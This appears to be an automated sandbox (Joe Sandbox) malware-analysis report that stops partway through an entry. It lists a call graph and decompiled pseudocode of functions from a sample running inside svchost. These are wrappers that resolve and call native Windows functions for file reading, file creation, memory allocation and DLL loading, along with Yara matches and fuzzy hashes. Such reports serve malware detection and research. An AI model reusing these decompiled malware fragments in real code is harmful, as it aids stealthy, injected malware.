419bc0 33949 41bdb0 2 API calls 33947->33949 33951 41bdb0 2 API calls 33948->33951 33950 419bca 33949->33950 33950->33902 33952 419c29 33951->33952 33952->33902 33954 40829f 33953->33954 33955 4081b5 33953->33955 33954->33904 33955->33954 33956 414a40 8 API calls 33955->33956 33957 408222 33956->33957 33958 41bdb0 2 API calls 33957->33958 33959 408249 33957->33959 33958->33959 33959->33904 33961 409335 33960->33961 33962 40ace0 LdrLoadDll 33961->33962 33963 409366 33962->33963 33965 40938d 33963->33965 33969 40cf10 33963->33969 33965->33936 33987 41a570 33966->33987 33970 40cf3c 33969->33970 33971 41a1d0 LdrLoadDll 33970->33971 33972 40cf55 33971->33972 33973 40cf5c 33972->33973 33980 41a210 33972->33980 33973->33965 33977 40cf97 33978 41a480 2 API calls 33977->33978 33979 40cfba 33978->33979 33979->33965 33981 41af50 LdrLoadDll 33980->33981 33982 41a22c 33981->33982 33986 3a69710 LdrInitializeThunk 33982->33986 33983 40cf7f 33983->33973 33983->33977 33985 41a800 LdrLoadDll 33983->33985 33985->33977 33986->33983 33988 41af50 LdrLoadDll 33987->33988 33989 41a58c 33988->33989 33992 3a69a00 LdrInitializeThunk 33989->33992 33990 419bb9 33990->33947 33990->33948 33992->33990 33994 408328 33993->33994 33995 40ace0 LdrLoadDll 33994->33995 33996 408343 33995->33996 33997 414e40 LdrLoadDll 33996->33997 33998 408353 33997->33998 33999 40835c PostThreadMessageW 33998->33999 34000 408370 33998->34000 33999->34000 34000->33920 34002 40f673 34001->34002 34008 419e80 34002->34008 34006 41af50 LdrLoadDll 34005->34006 34007 419d5c 34006->34007 34007->33928 34009 419e9c 34008->34009 34010 41af50 LdrLoadDll 34008->34010 34013 3a69840 LdrInitializeThunk 34009->34013 34010->34009 34011 40f69e 34011->33920 34013->34011 34014->33851 34016 419fcc 34015->34016 34017 41af50 LdrLoadDll 34015->34017 34020 3a699a0 LdrInitializeThunk 34016->34020 34017->34016 34018 40f4ee 34018->33856 34018->33858 34020->34018 34021->33863 34022->33868 34023->33873 34026 3a69540 LdrInitializeThunk

                                          Executed Functions

                                          Function 0041A3FA Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 38filenativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 41a3fa-41a449 call 41af50 NtReadFile
                                          APIs
                                          • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A445
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID: !JA$bMA$bMA
                                          • API String ID: 2738559852-4222312340
                                          • Opcode ID: ef10a2a631385ec49bcfd22315def20dce603307228e914972775937aa5eacd3
                                          • Instruction ID: 3a3a700734210796995d75502dc5a40e7190ddaea329ae01a61bcc1ce3973a29
                                          • Opcode Fuzzy Hash: ef10a2a631385ec49bcfd22315def20dce603307228e914972775937aa5eacd3
                                          • Instruction Fuzzy Hash: CFF0F4B2200108AFCB14CFA9CC81EEB77A9EF8C354F158249BA1DA7241D634E815CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A400 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 3 41a400-41a416 4 41a41c-41a449 NtReadFile 3->4 5 41a417 call 41af50 3->5 5->4
                                          C-Code - Quality: 37%
                                          			E0041A400(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041AF50(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x414a21
				_t6 =  &_a32; // 0x414d62
				_t12 =  &_a8; // 0x414d62
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}






                                          0x0041a403
                                          0x0041a40f
                                          0x0041a417
                                          0x0041a41c
                                          0x0041a422
                                          0x0041a43d
                                          0x0041a445
                                          0x0041a449

                                          APIs
                                          • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A445
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID: !JA$bMA$bMA
                                          • API String ID: 2738559852-4222312340
                                          • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                          • Instruction ID: 27817754ac388b25b847a3362b671b2e44b934df7eae6808a762aa4d31f9cf83
                                          • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                          • Instruction Fuzzy Hash: 93F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040ACE0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 234 40ace0-40acfc 235 40ad04-40ad09 234->235 236 40acff call 41cc40 234->236 237 40ad0b-40ad0e 235->237 238 40ad0f-40ad1d call 41d060 235->238 236->235 241 40ad2d-40ad3e call 41b490 238->241 242 40ad1f-40ad2a call 41d2e0 238->242 247 40ad40-40ad54 LdrLoadDll 241->247 248 40ad57-40ad5a 241->248 242->241 247->248
                                          C-Code - Quality: 100%
                                          			E0040ACE0(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041CC40(_a8,  &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041D060(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041D2E0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041B490(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                          0x0040acfc
                                          0x0040acff
                                          0x0040ad04
                                          0x0040ad09
                                          0x0040ad13
                                          0x0040ad18
                                          0x0040ad1b
                                          0x0040ad1d
                                          0x0040ad25
                                          0x0040ad2a
                                          0x0040ad2a
                                          0x0040ad31
                                          0x0040ad39
                                          0x0040ad3c
                                          0x0040ad3e
                                          0x0040ad52
                                          0x00000000
                                          0x0040ad54
                                          0x0040ad5a
                                          0x0040ad0e
                                          0x0040ad0e
                                          0x0040ad0e

                                          APIs
                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Load
                                          • String ID:
                                          • API String ID: 2234796835-0
                                          • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                          • Instruction ID: d499f532a4605d4acc668fd39ab8700ce4e6b27de0f8ef54b1fb0fb48fae0bb4
                                          • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                          • Instruction Fuzzy Hash: EF0152B5D4020DA7DB10EBA5DC42FDEB3789F14308F0041A5E908A7281F634EB54CB95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A34A Relevance: 1.5, APIs: 1, Instructions: 41filenativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 249 41a34a-41a3a1 call 41af50 NtCreateFile
                                          C-Code - Quality: 79%
                                          			E0041A34A(void* __eax, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t23;
				void* _t33;

				asm("sbb al, [esi-0x74aae469]");
				_t17 = _a4;
				_t3 = _t17 + 0xc40; // 0xc40
				E0041AF50(_t33, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t23 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t23;
			}





                                          0x0041a34c
                                          0x0041a353
                                          0x0041a35f
                                          0x0041a367
                                          0x0041a39d
                                          0x0041a3a1

                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A39D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: bdb20d1c9d1bf2a3c5fe37034acd5b13cf766e9ebee3def3c3fbf9c3dc7b58cc
                                          • Instruction ID: b8f53659752e134008c97cbb122b9f8bb4a195a559c5d3ad1457a91c1c9e4e18
                                          • Opcode Fuzzy Hash: bdb20d1c9d1bf2a3c5fe37034acd5b13cf766e9ebee3def3c3fbf9c3dc7b58cc
                                          • Instruction Fuzzy Hash: 0601F2B2200108AFCB08CF98CC90EEB7BA9EF8C354F058648FA5CD3240C630E811CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A350 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 252 41a350-41a366 253 41a36c-41a3a1 NtCreateFile 252->253 254 41a367 call 41af50 252->254 254->253
                                          C-Code - Quality: 100%
                                          			E0041A350(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041AF50(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                          0x0041a35f
                                          0x0041a367
                                          0x0041a39d
                                          0x0041a3a1

                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A39D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                          • Instruction ID: 880687b14e2bfdcefdfb108c829fe1d34a34742feba638e3287dae326a4d6923
                                          • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                          • Instruction Fuzzy Hash: AAF0BDB2201208AFCB08CF89DC85EEB77ADAF8C754F158248BA1D97241C630E8518BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A530 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 255 41a530-41a56d call 41af50 NtAllocateVirtualMemory
                                          C-Code - Quality: 100%
                                          			E0041A530(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041AF50(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                          0x0041a53f
                                          0x0041a547
                                          0x0041a569
                                          0x0041a56d

                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B124,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A569
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID:
                                          • API String ID: 2167126740-0
                                          • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                          • Instruction ID: 4e0f78fd3c2c10b6dba7ecb12144fed22081eaa1fb7babd41561f41a61d0d9a2
                                          • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                          • Instruction Fuzzy Hash: A3F015B2200208AFCB14DF89CC81EEB77ADAF88754F118149BE1C97241C630F811CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A47D Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 82%
                                          			E0041A47D(void* __eax, intOrPtr _a4, void* _a8) {
				long _t10;
				void* _t13;

				asm("out dx, al");
				_t7 = _a4;
				_t2 = _t7 + 0x10; // 0x300
				_t3 = _t7 + 0xc50; // 0x40a933
				E0041AF50(_t13, _a4, _t3,  *_t2, 0, 0x2c);
				_t10 = NtClose(_a8); // executed
				return _t10;
			}





                                          0x0041a47d
                                          0x0041a483
                                          0x0041a486
                                          0x0041a48f
                                          0x0041a497
                                          0x0041a4a5
                                          0x0041a4a9

                                          APIs
                                          • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4A5
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: ebb072795345e5f353774aee8f7fee5913e93ac977fb6327abad321425f51830
                                          • Instruction ID: 2b01a4993003d830642e2a63707c1ad994e9110a323c8223f9f68982306a05f3
                                          • Opcode Fuzzy Hash: ebb072795345e5f353774aee8f7fee5913e93ac977fb6327abad321425f51830
                                          • Instruction Fuzzy Hash: 58D012752101106FE714EF95CC45ED77769EF44364F554459B91C9B242C530E51487A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A480 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0041A480(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a933
				E0041AF50(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                          0x0041a483
                                          0x0041a486
                                          0x0041a48f
                                          0x0041a497
                                          0x0041a4a5
                                          0x0041a4a9

                                          APIs
                                          • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4A5
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                          • Instruction ID: 58703de6d0d09b45194c1a78dafb6a6614d70e6a8447524affba2eb7b0ba4c9c
                                          • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                          • Instruction Fuzzy Hash: E9D01776200214ABD710EB99CC85EE77BACEF48764F154499BA1C9B242C530FA1086E4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A69A20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 01e528111d6fc9ebdbaeb860cd5f47906123d1248d7dda8960d4dcd118ed79d6
                                          • Instruction ID: 0a99da8c449ce5817a3f84c56ee2932218884965055e19cd1cd525d59a9e6323
                                          • Opcode Fuzzy Hash: 01e528111d6fc9ebdbaeb860cd5f47906123d1248d7dda8960d4dcd118ed79d6
                                          • Instruction Fuzzy Hash: 0C900261601044425140B1798C889065005BFE1251751C122A0989550D8699886566B5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A69A00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: b6f0351b771bcc67668fe29f1d69207d217e3b8fbc1a8cb7f7840c90e173eb9f
                                          • Instruction ID: a82c6ec59b24f64dccb36666a8c0c3c2962851c8e9c923aebcfcd337000f424e
                                          • Opcode Fuzzy Hash: b6f0351b771bcc67668fe29f1d69207d217e3b8fbc1a8cb7f7840c90e173eb9f
                                          • Instruction Fuzzy Hash: 5390027120144802E100A1694C5870B10059BD0342F51C012A1155555D8765885175B1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A69A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: db6a661cbdf481216786036bd471a5cbeb01e0e7215ed7c779a06f0a21856197
                                          • Instruction ID: 729207362e6a40be38404bd712be6d800f691d9ebda7c42a07a2380d7b69f2d6
                                          • Opcode Fuzzy Hash: db6a661cbdf481216786036bd471a5cbeb01e0e7215ed7c779a06f0a21856197
                                          • Instruction Fuzzy Hash: 7D90026121184442E200A5794C58B0710059BD0343F51C116A0145554CCA5588616571
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A699A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: dfac68804d052c4868f6bcd543b36ef3d8700e0c360db00b38dcd59e26d2a4e6
                                          • Instruction ID: 44262468ee87993cd8c67480df7a7b1f5ac87f0bba6650e7990ea0231f9e36bf
                                          • Opcode Fuzzy Hash: dfac68804d052c4868f6bcd543b36ef3d8700e0c360db00b38dcd59e26d2a4e6
                                          • Instruction Fuzzy Hash: 3D9002A134104842E100A1694858B061005DBE1341F51C016E1055554D8759CC527176
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A69910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: d08c902363993be44f92dbb0b499f9c727cb91616ce5d11dcbebd00d96b5cb68
                                          • Instruction ID: 6d2177fbd1f68e94df6f0e0051f03f026adf72764409d6d14fd27e56a110e2ba
                                          • Opcode Fuzzy Hash: d08c902363993be44f92dbb0b499f9c727cb91616ce5d11dcbebd00d96b5cb68
                                          • Instruction Fuzzy Hash: A69002B120104802E140B169484874610059BD0341F51C012A5055554E87998DD576B5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A698F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: ec3be405ad01fbe8c88a0516cf2c7419259f4be21843ea7c463d0fb177a0f7b1
                                          • Instruction ID: 14de7a9180f3e675ea7ad5ccd8469ea0f3e72a62db99ce5af25b2898a6282519
                                          • Opcode Fuzzy Hash: ec3be405ad01fbe8c88a0516cf2c7419259f4be21843ea7c463d0fb177a0f7b1
                                          • Instruction Fuzzy Hash: AC90026160104902E101B1694848616100A9BD0281F91C023A1015555ECB658992B171
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A69860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: cfd6b6008e4832260095f2e42809ed2a52ea8fade8a94a4267f5c51ec3b1e797
                                          • Instruction ID: 27d58bb3dd5f8236bb02428bbdeea816966bdb51fda715268dede09c90fa8bea
                                          • Opcode Fuzzy Hash: cfd6b6008e4832260095f2e42809ed2a52ea8fade8a94a4267f5c51ec3b1e797
                                          • Instruction Fuzzy Hash: 7690027120104813E111A169494870710099BD0281F91C413A0415558D97968952B171
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A69840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 781af753466bc27671bd5e303761baacbb48e30defd01042b72516ebc874056d
                                          • Instruction ID: a5a557d8d0071509ae8945f0d43b9831a1bcb82960969143d2e686814248ae98
                                          • Opcode Fuzzy Hash: 781af753466bc27671bd5e303761baacbb48e30defd01042b72516ebc874056d
                                          • Instruction Fuzzy Hash: 85900261242085526545F16948485075006ABE0281791C013A1405950C86669856E671
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A697A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: cdd281aec62d3dde3aca4be26982490399330b1c62e19e0b74834991e821afd6
                                          • Instruction ID: ade0b012ffd20e4191ae3571383e11bbdec89c32190f4b16db86979bbd2c2fe1
                                          • Opcode Fuzzy Hash: cdd281aec62d3dde3aca4be26982490399330b1c62e19e0b74834991e821afd6
                                          • Instruction Fuzzy Hash: 8890026130104403E140B169585C6065005EBE1341F51D012E0405554CDA5588566272
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A69780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 5e0c1fe9d64efc0e15e74e328e47814e89bbacda97581a11ec05f8664ae04109
                                          • Instruction ID: a453ce70747d9644523013041b05991b157098bd128b860e15426eaa27141e51
                                          • Opcode Fuzzy Hash: 5e0c1fe9d64efc0e15e74e328e47814e89bbacda97581a11ec05f8664ae04109
                                          • Instruction Fuzzy Hash: D890026921304402E180B169584C60A10059BD1242F91D416A0006558CCA5588696371
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A69710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: d6e890668fc587578f835c6c56a80b0bae140b595d36b001053ed141f307a824
                                          • Instruction ID: 77f79df155a1e545931f540ad38914c925161fb363533986191680713fad1a3d
                                          • Opcode Fuzzy Hash: d6e890668fc587578f835c6c56a80b0bae140b595d36b001053ed141f307a824
                                          • Instruction Fuzzy Hash: 6E90027120104802E100A5A9584C64610059BE0341F51D012A5015555EC7A588917171
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A696E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 031ebef30c1e922ca0db4c9d3a493dead983ecb4cc7dcc279cf27af94c9a8e28
